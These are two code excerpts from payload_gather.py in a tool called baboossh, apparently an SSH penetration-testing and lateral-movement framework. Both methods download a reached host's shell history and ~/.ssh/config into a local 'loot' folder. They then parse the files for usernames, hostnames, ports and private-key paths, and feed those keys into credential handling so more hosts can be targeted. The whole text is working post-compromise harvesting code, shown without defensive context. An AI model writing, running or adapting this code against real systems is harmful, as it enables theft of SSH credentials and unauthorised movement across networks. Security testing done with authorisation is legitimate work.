コード例 #1
0
ファイル: payload_gather.py プロジェクト: cybiere/baboossh
    def gatherFromHistory(self, historyFile):
        lootFolder = os.path.join(self.wspaceFolder, "loot")
        filename = str(self.connection.endpoint).replace(":", "-") + "_" + str(
            self.connection.user) + "_" + historyFile.replace("/", "_")
        filepath = os.path.join(lootFolder, filename)
        try:
            self.sftp.get(historyFile, filepath)
        except Exception as e:
            print(e)
            return None
        with open(filepath, "r", errors="ignore") as dledFile:
            data = dledFile.read()
        lines = data.splitlines()
        for line in lines:
            if re.search(r'^ *ssh ', line):
                option = ""
                words = line.split()
                host = False
                port = None
                user = None
                identity = None

                for i in range(1, len(words)):
                    if option != "":
                        if option == "identity":
                            identity = words[i]
                            if identity[:2] == '~/':
                                identity = identity[2:]
                        elif option == "port":
                            port = words[i]
                        option = ""
                    elif words[i][0] == "-":
                        if words[i] == "-i":
                            option = "identity"
                        elif words[i] == "-p":
                            option = "port"
                        else:
                            option = words[i]
                    elif not host:
                        if '@' in words[i]:
                            user, hostname = words[i].split("@", 1)
                        else:
                            hostname = words[i]
                        host = True
                if not host:
                    continue
                endpoints = self.hostnameToIP(hostname, port)
                if user is not None:
                    user = User(user)
                    if not self.connection.scope:
                        user.scope = False
                    if user.id is None:
                        user.found = self.connection.endpoint
                        user.save()
                        self.newUsers.append(user)
                if identity is not None:
                    identity = self.getKeyToCreds(identity, ".")
コード例 #2
0
ファイル: payload_gather.py プロジェクト: cybiere/baboossh
    def gatherFromConfig(self):
        lootFolder = os.path.join(self.wspaceFolder, "loot")
        filename = str(self.connection.endpoint).replace(":", "-") + "_" + str(
            self.connection.user) + "_.ssh_config"
        filepath = os.path.join(lootFolder, filename)

        try:
            self.sftp.get(".ssh/config", filepath)
        except Exception as e:
            return None

        with open(filepath, 'r', errors='replace') as f:
            data = f.read()
        lines = data.split('\n')
        curHost = None
        for line in lines:
            if line == '':
                continue
            if line[:5].lower() == "Host ".lower():
                if curHost != None and curHost["name"] != "*":
                    if "host" in curHost.keys():
                        host = curHost["host"]
                    else:
                        host = curHost["name"]
                    if "port" in curHost.keys():
                        port = curHost["port"]
                    else:
                        port = None
                    endpoints = self.hostnameToIP(host, port)
                    user = None
                    identity = None
                    if "user" in curHost.keys():
                        user = User(curHost["user"])
                        if not self.connection.scope:
                            user.scope = False
                        if user.id is None:
                            user.found = self.connection.endpoint
                            user.save()
                            self.newUsers.append(user)
                    if "identity" in curHost.keys():
                        identity = self.getKeyToCreds(curHost["identity"], ".")
                curHost = {}
                curHost["name"] = line.split()[1]
            else:
                [key, val] = line.strip().split(' ', 1)
                key = key.lower()
                if key == "user":
                    curHost['user'] = val
                elif key == "port":
                    curHost['port'] = val
                elif key == "hostname":
                    curHost['host'] = val
                elif key == "identityfile":
                    if val[:2] == '~/':
                        val = val[2:]
                    curHost['identity'] = val
        if curHost != None and curHost["name"] != "*":
            if "host" in curHost.keys():
                host = curHost["host"]
            else:
                host = curHost["name"]
            if "port" in curHost.keys():
                port = curHost["port"]
            else:
                port = None
            endpoints = self.hostnameToIP(host, port)
            user = None
            identity = None
            if "user" in curHost.keys():
                user = User(curHost["user"])
                if not self.connection.scope:
                    user.scope = False
                if user.id is None:
                    user.found = self.connection.endpoint
                    self.newUsers.append(user)
                    user.save()
            if "identity" in curHost.keys():
                identity = self.getKeyToCreds(curHost["identity"], ".")